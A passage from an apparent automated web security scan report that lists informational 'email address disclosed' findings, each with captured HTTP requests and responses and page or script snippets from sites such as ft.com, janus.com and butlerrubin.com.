Referer: http://maps.google.com/maps?hl=en&source=hp&q=530+Virginia+Road+P.O.+Box+9133+Concord,+Massachusetts&ie=UTF8&hq=&hnear=530+Virginia+Rd,+Concord,+Middlesex,+Massachusetts+01742&z=14&iwloc=r10&ll=42.476402,-71.298008&output=embed

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Wed, 11 May 2011 01:41:09 GMT
Date: Thu, 12 May 2011 01:57:41 GMT
Expires: Fri, 11 May 2012 01:57:41 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Cache-Control: public, max-age=31536000
Age: 37836
Content-Length: 113403

__gjsload_maps2__('util', 'GAddMessages({});var nr=function(a,b){var c=1<<b+8;a.x=(a.x%c+c)%c;c=23-b;return new R(a.x<<c,a.y<<c)}, Vr=function(a){return a.Ta.Vu()}; function zl(a){this.ticks=a;this.ti
...[SNIP]...
100%;height:2em;line-height:2em;top:-.5em;overflow:hidden;position:absolute;left:0}', []);
__gjsload_maps2__('strr', 'GAddMessages({13828:"Sign in to use stars with",13829:"Sign in »",13830:"ex: pat@gmail.com",13831:"No account yet?",13832:"It\'s free and easy.",13833:"Create an account »",13338:"Seeing stars",13339:"When you star an item, it appears on your maps and is listed in My Maps.<br />
...[SNIP]...

22.25. http://media.ft.com/j/FTTrack2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.ft.com
Path:	/j/FTTrack2.js

Issue detail

The following email address was disclosed in the response:

ftsales.support@ft.com

Request

GET /j/FTTrack2.js HTTP/1.1
Host: media.ft.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUserTrack=173.193.214.243.1305198170970491; AYSC=_04dc_13USA_14USA_15us_17mid%2Batlantic_18washington_24north%2Bamerica_25high_26202_27PVT_99S_; GZIP=1; opFTData=%26v%3D1; opTrackSess=%26t%3D1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:07 GMT
Expires: Thu, 12 May 2011 21:05:28 GMT
Last-Modified: Fri, 04 Feb 2011 11:34:25 GMT
Cache-Control: max-age=43200
Content-Type: application/x-javascript
ETag: "737e-4d4be441"
Accept-Ranges: bytes
Server: Apache/1.3.37
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Content-Length: 29566

if(!document.cookie.match(/FTUserTrack=((\d{1,3}\.){3}\d{1,3})/))
{var call='<scr'+'ipt type="text/javascript" src="';call+=isSecure(document)?'https:':'http:';call+='//track.ft.com/track/';call+=isS
...[SNIP]...
</a> which allow you to: share links; copy content for personal use; & redistribute limited extracts. Email ftsales.support@ft.com to buy additional rights or use this link to reference the article -","t":true};return Tynt;},doTynt:function(){if(typeof Tynt!="undefined"&&document.location.protocol=='http:'){var s=document.createE
...[SNIP]...

22.26. http://securelab.digiware.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://securelab.digiware.net
Path:	/

Issue detail

The following email address was disclosed in the response:

sales@dollarcar.org

Request

GET / HTTP/1.1
Host: securelab.digiware.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 14:25:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://securelab.digiware.net/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 14395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<he
...[SNIP]...
<p>Inicialmente llega al usuario un mensaje de correo asociado a Rent Car, haciendo referencia a una orden de compra la cual no se ha realizado. La fuente de correo es sales@dollarcar.org con el siguiente mensaje:</p>
...[SNIP]...

22.27. https://services.sungarddx.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.sungarddx.com
Path:	/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Investran.DXSupport@sungard.com
port@sungard.com
support@sungarddx.com

Request

GET /default.aspx?DN=244163,1,Documents&CommunityDN=161476,1,Documents HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v; ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 11:41:03 GMT
Content-Length: 5910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<script language="javascript">
if (
...[SNIP]...
<A href="mailto:support@sungarddx.com"><U><A href="mailto:Investran.DXSupport@sungard.com">Investran.DXSup</U>port@sungard.com</A>
...[SNIP]...

22.28. http://translate.googleapis.com/translate_a/t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.googleapis.com
Path:	/translate_a/t

Issue detail

The following email address was disclosed in the response:

danaeabiga@danaeabigail.com

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://honey.digiware.net/
Origin: http://honey.digiware.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 1400

q=Colombian%20HoneyNet%20Project&q=Un%20Cap%C3%ADtulo%20de%20Honeynet%20Project&q=Search&q=Home&q=About&q=Pages&q=About&q=Archives&q=August%202010&q=June%202010&q=Categories&q=%3Ca%20i%3D0%3EArticulos
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:17 GMT
Expires: Thu, 12 May 2011 13:07:17 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=7f6e1447059fbca4:TM=1305205637:LM=1305205637:S=tQmIDboQEPIYiGYZ; expires=Sat, 11-May-2013 13:07:17 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1102

["Colombian Honeynet Project","A Chapter of the Honeynet Project","Search","Home","About","Pages","About","Archives","August 2010","June 2010","Categories","\x3ca i=0\x3eArticles\x3c/a\x3e \x3ca i=1\x
...[SNIP]...
ng email and focused job site referring to \x26quot;elempleo.com\x26quot; through an email that states the following:","\x3ca i=0\x3eFrom:\x3c/a\x3e \x3ca i=1\x3eAbigail Danae Lizana Gonzales [mailto: danaeabiga@danaeabigail.com]\x3c/a\x3e","\x3ca i=0\x3eSent:\x3c/a\x3e \x3ca i=1\x3eSunday, January 18, 2009 3:29 pm\x3c/a\x3e","\x3ca i=0\x3eTo:\x3c/a\x3e \x3ca i=1\x3eXXXXXXXXXX\x3c/a\x3e","\x3ca i=0\x3eSubject:\x3c/a\x3e \x3ca
...[SNIP]...

22.29. http://translate.googleapis.com/translate_a/t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.googleapis.com
Path:	/translate_a/t

Issue detail

The following email addresses were disclosed in the response:

info-ec@digiware.net
info-pe@digiware.net
info-usa@digiware.net

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.digiware.net/index.php?option=com_wrapper&view=wrapper&Itemid=82
Origin: http://www.digiware.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 936

q=%0ATel.%3A%3A%20(51)%201-6522307&q=%0AFax%3A%20(51)%20-%201-6381584&q=%0ALima%2C%20Per%C3%BA%20&q=info-pe%40digiware.net&q=DIGIWARE%20ECUADOR&q=%0AIgnacio%20San%20mar%C3%ADa%20No.%20E3-30%20y%20Nu%C
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:47 GMT
Expires: Thu, 12 May 2011 13:07:47 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=4d055b353f0bfe86:TM=1305205667:LM=1305205667:S=KAqwcEu987gI1Cyx; expires=Sat, 11-May-2013 13:07:47 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 774

["\nTel: (51) 1-6522307","\nFax: (51) - 1-6381584","\nLima, Peru ","info-pe@digiware.net","ECUADOR DIGIWARE","\nIgnacio San Maria No. E3-30 and Nu..ez de Vela, Metropolis Building, Mezzanine 8. ","\nTel: (593) 2243 5434 ","\nFax: (593) - 2225 4296 ","\nQuito, Ecuador ","San Jorge No. 105 Avenue and Ninth Street., Delta Building, Room 212.","\nTel / fax: (593) 4228 2940","\nGuayaquil, Ecuador ","info-ec@digiware.net"," Toll Free ","\nGuayaquil: 1-999-170 ","\nEcuador :1-800-999-190 - pin 6241 ","DIGIWARE USA","\n1111 Brickell Avenue, 11th Floor","\n\x3ci\x3eMiami, FL 33131.\x3c/i\x3e \x3cb\x3eMiami, FL 33131.\x3c/b\x3e \x3ci\x3eUSA\x3c/i\x3e \x3cb\x3eUSA\x3c/b\x3e","Tel: (305) 913-8569","\nFax.: (305) 913-4101","info-usa@digiware.net","CONTACT U.S.","CONTACT U.S."]

22.30. http://translate.googleapis.com/translate_a/t previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://translate.googleapis.com
Path:	/translate_a/t

Issue detail

The following email addresses were disclosed in the response:

info-ch@digiware.net
info@digiware.net

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.digiware.net/index.php?option=com_wrapper&view=wrapper&Itemid=82
Origin: http://www.digiware.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 1424

q=%3Ca%20i%3D0%3EQUIENES%20SOMOS%3C%2Fa%3E%3Ca%20i%3D1%3EDIGISERT%3C%2Fa%3E%3Ca%20i%3D2%3ESOPORTE%3C%2Fa%3E%3Ca%20i%3D3%3EEMPLEO%3C%2Fa%3E%3Ca%20i%3D4%3ESERVICIO%20AL%20CLIENTE%3C%2Fa%3E%3Ca%20i%3D5%3
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:44 GMT
Expires: Thu, 12 May 2011 13:07:44 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=7b585fd0ad932d7a:TM=1305205664:LM=1305205664:S=gBcCMR9hs3gJsHbC; expires=Sat, 11-May-2013 13:07:44 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1363

["\x3ca i=0\x3eABOUT\x3c/a\x3e \x3ca i=1\x3eDIGISERT\x3c/a\x3e \x3ca i=2\x3eSUPPORT\x3c/a\x3e \x3ca i=3\x3eJOBS\x3c/a\x3e \x3ca i=4\x3eCUSTOMER SERVICE\x3c/a\x3e \x3ca i=5\x3eCONTACT U.S.\x3c/a\x3e","
...[SNIP]...
mpany:","E-Mail:","Phone:","Your comment is very important to us:","submit","CHILE DIGIWARE","Alcantara 200, Piso 6","Las Condes ","Tel: (56 2) 370 29 43 ","Fax.: (56 2) 369 56 57 ","Santiago, Chile","info-ch@digiware.net","COLOMBIA DIGIWARE","\n\x3ci\x3eCalle 100 No. 13 -21 Of.\x3c/i\x3e \x3cb\x3eCalle 100 No. 13 -21 Of.\x3c/b\x3e \x3ci\x3e301\x3c/i\x3e \x3cb\x3e301\x3c/b\x3e ","\nTel: (57) 1-508 2220 ","\n\x3ci\x3eFa
...[SNIP]...
r No. 42-70.\x3c/b\x3e \x3ci\x3eTorre 2 Ofic 1016\x3c/i\x3e \x3cb\x3e1016 Tower 2 Ofic\x3c/b\x3e ","\n(57) 4-6040465 - (57) 4-6040467","\nMedellin, Colombia","International Phone: +1 (786) 924-3806 ","info@digiware.net","PERU DIGIWARE","\nOffice 1121 Av Camino Real 711 San Isidro "]

22.31. http://w.sharethis.com/button/buttons.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://w.sharethis.com
Path:	/button/buttons.js

Issue detail

The following email address was disclosed in the response:

support@sharethis.com

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:26:10 GMT
ETag: "3067b-9ecb-4a29ec924b080"
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Thu, 12 May 2011 12:36:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40651

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
lse};stLight.onReady=function(){stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.log("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b="share4x";if(switchTo5x){b="share5x"}if(stLight.hasButtonOnPage()){if(stLight.loadedFromBar){if(switchTo5x){b="bar_share5x"}else{b="bar_share4x"}}}else{if(stLight.loadedFromBar){b=
...[SNIP]...

22.32. https://ww3.janus.com/advisor/js/modalbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ww3.janus.com
Path:	/advisor/js/modalbox.js

Issue detail

The following email address was disclosed in the response:

andrej.okonetschnikow@gmail.com

Request

GET /advisor/js/modalbox.js HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000

Response

HTTP/1.1 200 OK
Server:
ETag: W/"28789-1304985196506"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: text/javascript
Date: Thu, 12 May 2011 11:15:43 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 28789

var arContentLabel = "";

function showOverlay(name, contentLabel, linkRef)
{
   var url = "";
   var forwardURL = null;
   var width = 450;
   arContentLabel = (contentLabel != null) ? contentLabel : "";
   sw
...[SNIP]...
ideoid=" + videoid, {title:false, transitions: false, width: wWidth});
}

/*
ModalBox - The pop-up window thingie with AJAX, based on prototype and script.aculo.us.

Copyright Andrey Okonetchnikov (andrej.okonetschnikow@gmail.com), 2006-2007
All rights reserved.

VERSION 1.6.0
Last Modified: 12/13/2007
*/

if (!window.Modalbox)
   var Modalbox = new Object();

Modalbox.Methods = {
   overrideAlert: false, // Override standard bro
...[SNIP]...

22.33. https://ww3.janus.com/advisor/js/validation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ww3.janus.com
Path:	/advisor/js/validation.js

Issue detail

The following email address was disclosed in the response:

fred@domain.com

Request

GET /advisor/js/validation.js HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000

Response

HTTP/1.1 200 OK
Server:
ETag: W/"10728-1304985196521"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: text/javascript
Date: Thu, 12 May 2011 11:15:43 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10728

/*
* Really easy field validation with Prototype
* http://tetlaw.id.au/view/javascript/really-easy-field-validation
* Andrew Tetlaw
* Version 1.5.4.1 (2007-01-05)
*
* Copyright (c) 2007 Andrew
...[SNIP]...
a valid date.', function(v) {
               var test = new Date(v);
               return Validation.get('IsEmpty').test(v) || !isNaN(test);
           }],
   ['validate-email', 'Please enter a valid email address. For example fred@domain.com .', function (v) {
               return Validation.get('IsEmpty').test(v) || /\w{1,}[@][\w\-]{1,}([.]([\w\-]{1,})){1,3}$/.test(v)
           }],
   ['validate-url', 'Please enter a valid URL.', function (v) {
               ret
...[SNIP]...

22.34. http://www.ams-legal.com/services_and_support.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ams-legal.com
Path:	/services_and_support.asp

Issue detail

The following email addresses were disclosed in the response:

services@ams-legal.com
support@ams-legal.com
training@ams-legal.com

Request

GET /services_and_support.asp HTTP/1.1
Host: www.ams-legal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ams-legal.com/
Cookie: ASPSESSIONIDQCDBQTBR=FNMNHADBMFJOPANMPFFMINHD; __utma=96668943.780464326.1305203529.1305203529.1305203529.1; __utmb=96668943.1.10.1305203529; __utmc=96668943; __utmz=96668943.1305203529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5316
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="mailto:support@ams-legal.com">support@ams-legal.com</a>
...[SNIP]...
<a href="mailto:training@ams-legal.com">training@ams-legal.com</a>
...[SNIP]...
<a href="mailto:services@ams-legal.com">services@ams-legal.com</a>
...[SNIP]...

22.35. http://www.apolloglobal.us/templates/global/js/roksameheight.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apolloglobal.us
Path:	/templates/global/js/roksameheight.js

Issue detail

The following email address was disclosed in the response:

djamil@djamil.it

Request

GET /templates/global/js/roksameheight.js HTTP/1.1
Host: www.apolloglobal.us
Proxy-Connection: keep-alive
Referer: http://www.apolloglobal.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: b01a8bbc2b6e57a153d5c05069526f2b=93f4b5ee63e125f5d13d6f1a57f43699

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 09:31:14 GMT
Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6.4
Last-Modified: Fri, 16 Jan 2009 15:08:58 GMT
ETag: "b102e-205-f3c75680"
Accept-Ranges: bytes
Content-Length: 517
Content-Type: application/x-javascript

/*
Get the maximum height from divs with passed class as argument
Djamil Legato <djamil@djamil.it>
For Andy Miller
*/

var maxHeight = function(classname) {
var divs = document.
...[SNIP]...

22.36. http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bloomberg.com
Path:	/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html

Issue detail

The following email address was disclosed in the response:

jkelly101@bloomberg.net

Request

Response

22.37. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The following email address was disclosed in the response:

jhurtado@butlerrubin.com

Request

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_01ov.jpg">
...[SNIP]...

22.38. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The following email address was disclosed in the response:

jhurtado@butlerrubin.com

Request

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_02ov.jpg">
...[SNIP]...

22.39. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The following email address was disclosed in the response:

jhurtado@butlerrubin.com

Request

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_03ov.jpg">
...[SNIP]...

22.40. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The following email address was disclosed in the response:

jhurtado@butlerrubin.com

Request

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_04ov.jpg">
...[SNIP]...

22.41. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The following email address was disclosed in the response:

jhurtado@butlerrubin.com

Request

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_05ov.jpg">
...[SNIP]...

22.42. http://www.condorlabs.net/wp-content/themes/idream/js/jquery.pngFix.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.condorlabs.net
Path:	/wp-content/themes/idream/js/jquery.pngFix.js

Issue detail

The following email addresses were disclosed in the response:

andreas.eberhard@gmail.com
scott@filamentgroup.com

Request

GET /wp-content/themes/idream/js/jquery.pngFix.js HTTP/1.1
Host: www.condorlabs.net
Proxy-Connection: keep-alive
Referer: http://www.condorlabs.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 14:25:14 GMT
Server: Apache
Last-Modified: Fri, 02 Apr 2010 10:59:22 GMT
ETag: "1c102f5-12ac-4833edf281680"
Accept-Ranges: bytes
Content-Length: 4780
Content-Type: application/x-javascript

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Changelog:

...[SNIP]...
from selectors
* 11.09.2007 Version 1.1
* - removed noConflict
* - added png-support for input type=image
